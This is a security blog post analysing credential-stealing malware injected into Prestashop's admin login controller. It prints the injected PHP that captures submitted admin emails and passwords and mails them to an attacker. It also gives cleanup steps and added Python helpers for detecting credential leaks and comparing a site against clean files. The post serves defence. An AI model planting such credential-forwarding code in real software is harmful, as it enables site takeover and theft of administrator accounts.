Prestashop Credential Stealing Malware [2021]

Updated on: January 14, 2021

As a growing e-commerce platform, Prestashop is a huge target for hackers who wish to steal information. Usually, the information that is targeted is credit card numbers, but recently, our researchers have discovered a new type of credential stealing malware that targets Prestashop sites and steals the site admin credentials. This could lead to the complete takeover of your website.

How the Prestashop Credential Stealing Malware Works

The Prestashop credential stealing malware was found injected into the file ./controllers/admin/AdminLoginController.php on Prestashop sites, like this:

    public function processLogin()
    {
        /* Check fields validity */
        $passwd = trim(Tools::getValue('passwd'));
        $email = trim(Tools::getValue('email'));
        // Injected lines: build an email containing the submitted credentials
        $to = "[email protected]";
        $subject = "panel admin prestashop ". $_SERVER['SERVER_NAME'];
        $header = "from: hacked <[email protected]>";
        $message = "Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] ."&up=hous \r\n email: $email \r\n pass: $passwd \r\n by bajatax -- sniper :v \r\n";
        $message .= "Path : " . __file__;
        // Injected lines: send the message (mail() is called twice, errors suppressed with @)
        $sentmail = @mail($to, $subject, $message, $header);
        $sentmail1 = @mail($to, $subject, $message, $header);
        // ... the original processLogin() body continues here

This code copies server information and submitted form values into variables. Among them are the usernames and passwords used to log into the Prestashop back-end. The collected information is sent to the hacker’s email address using the PHP mail() function.
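To check a login controller for this pattern, the added example below (not part of the original article) follows the password variable line by line and reports any call that sends it out. It is a heuristic that assumes one statement per line; the sinks other than mail() are a generalisation beyond the sample shown, and both PHP snippets are constructed test input with a placeholder recipient.

```python
import re

# Constructed input modelled on the injected lines shown above
# (placeholder recipient address, shortened subject and header).
SAMPLE = r'''
public function processLogin()
{
    $passwd = trim(Tools::getValue('passwd'));
    $email = trim(Tools::getValue('email'));
    $to = "attacker@example.invalid";
    $message = "email: $email \r\n pass: $passwd \r\n";
    $message .= "Path : " . __file__;
    $sentmail = @mail($to, "panel admin", $message, "from: x");
}
'''
# Constructed clean counterpart: the password is read but never sent anywhere.
CLEAN = r'''
public function processLogin()
{
    $passwd = trim(Tools::getValue('passwd'));
    $email = trim(Tools::getValue('email'));
    if (empty($email)) { $this->errors[] = 'Email is empty.'; }
}
'''

SOURCE = re.compile(r"getValue\(\s*['\"](passwd|password)['\"]")
ASSIGN = re.compile(r"^\s*(\$\w+)\s*(\.?=)(?!=)\s*(.*)$")
SINK = re.compile(r"@?\b(mail|curl_exec|file_put_contents|fwrite|fsockopen)\s*\((.*)\)")
VAR = re.compile(r"\$\w+")

def find_credential_leaks(php_source):
    """Return (line_no, sink, tainted_vars) for each sink call fed by the password."""
    tainted, hits = set(), []
    for no, line in enumerate(php_source.splitlines(), 1):
        sink = SINK.search(line)
        if sink:
            used = sorted(set(VAR.findall(sink.group(2))) & tainted)
            if used:
                hits.append((no, sink.group(1), used))
        m = ASSIGN.match(line)
        if m:
            lhs, op, rhs = m.groups()
            if SOURCE.search(rhs) or set(VAR.findall(rhs)) & tainted:
                tainted.add(lhs)      # value derived from the submitted password
            elif op == "=":
                tainted.discard(lhs)  # overwritten with clean data
    return hits
```

Run it over the text of AdminLoginController.php from the live site; any hit is a line to compare against the original file of the same Prestashop release.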

The email that is sent has everything the attacker needs to log into the hacked Prestashop site. This gives them complete access to your website’s back-end interface, which means that they can change the content, install fake/infected modules or plugins, and do a whole lot more.

In some cases, victims of this hack began to receive bounce-back emails – which is likely due to Google detecting the attack and disabling/reporting the accounts involved.

The attacker/hacking group running this malware infection campaign is believed to go by the name bajatx / B4JAT4T.

How to Fix Your Site After a Prestashop Credential Stealing Malware Infection

1. Take a backup of your site before cleaning.

It’s advisable to take the website offline so that users don’t visit the infected pages while you’re cleaning it. Make sure to take a backup of all the core files and databases. It’s a good idea to take the backup in a compressed file format, like .zip.

2. Replace the core, plugin, and theme files.

You can replace the infected core files with their original versions from reputable sources. After downloading fresh and updated versions of these files and directories, you can delete the older ones. This is especially important in cleaning up Prestashop credential stealing malware, as malicious code has been found inside the core files.

3. Clean any suspicious, recently modified files. 

You might find potentially infected files by looking at the ones which were recently modified. You can restore these files from a clean backup you have or from a trusted source. 

4. Run a malware scan.

Scan your web server for malware and malicious files. You can use the ‘Virus Scanner’ tool in the cPanel provided by your web host, or get expert malware cleanup with the Astra Pro Plan, which blocks the attack and also the bots which try to download the stolen data.
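Steps 2 and 3 can be combined into one check: compare the live site against a freshly downloaded copy of the same Prestashop release and list files that differ, are unknown to the release, or were modified recently. This is an added example, not part of the original article; the directory layout in demo() is constructed, and the 30-day window is an assumed default.

```python
import hashlib, os, tempfile, time
from pathlib import Path

def sha256(path):
    return hashlib.sha256(Path(path).read_bytes()).hexdigest()

def index(root):
    """Map each file's path relative to root onto its full path."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): p for p in root.rglob("*") if p.is_file()}

def compare_with_clean(live_root, clean_root, recent_days=30, now=None):
    """Classify live files against a clean copy of the same release."""
    now = time.time() if now is None else now
    live, clean = index(live_root), index(clean_root)
    report = {"modified": [], "unknown": [], "recent": []}
    for rel, path in sorted(live.items()):
        if rel not in clean:
            report["unknown"].append(rel)     # not shipped with the release
        elif sha256(path) != sha256(clean[rel]):
            report["modified"].append(rel)    # core file whose content changed
        if now - path.stat().st_mtime < recent_days * 86400:
            report["recent"].append(rel)      # touched inside the window
    report["missing"] = sorted(set(clean) - set(live))
    return report

def demo():
    """Build two small constructed trees (live and clean) and compare them."""
    with tempfile.TemporaryDirectory() as tmp:
        live, clean = Path(tmp, "live"), Path(tmp, "clean")
        login = "controllers/admin/AdminLoginController.php"
        files = {login: "<?php // login controller\n", "index.php": "<?php // front\n"}
        for root in (live, clean):
            for rel, body in files.items():
                (root / rel).parent.mkdir(parents=True, exist_ok=True)
                (root / rel).write_text(body)
        old = time.time() - 400 * 86400
        for p in index(live).values():
            os.utime(p, (old, old))           # pretend the install is over a year old
        (live / login).write_text("<?php // login controller\n// extra injected line\n")
        (live / "upload.php").write_text("<?php // dropped file\n")
        return compare_with_clean(live, clean)
```

On a real site the "unknown" list will also contain legitimate uploads, modules and cache files, so review it rather than deleting everything in it; "modified" core files are the ones to replace from the clean copy.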

In addition to these steps, you may find this article on Prestashop security helpful.

How to Prevent Further Attacks

After fixing your site, here are a few good security practices to follow which ensure that your website stays safe from Prestashop credential stealing malware:

  • Make sure you’re running the latest update of your software
  • Use trusted third-party payment processors
  • Perform regular malware scans/security audits
  • Invest in a firewall

The only sure-fire way to protect your website from hackers’ ever evolving methods is to invest in security. It is a great idea to invest in a website firewall, run frequent malware scans, and get regular security audits as that can give you a great idea of your website’s overall security. 

Sreenidhi is a tech enthusiast who enjoys writing about cybersecurity and data science. Her areas of interest include WordPress security, new malware, and recent cybersecurity news.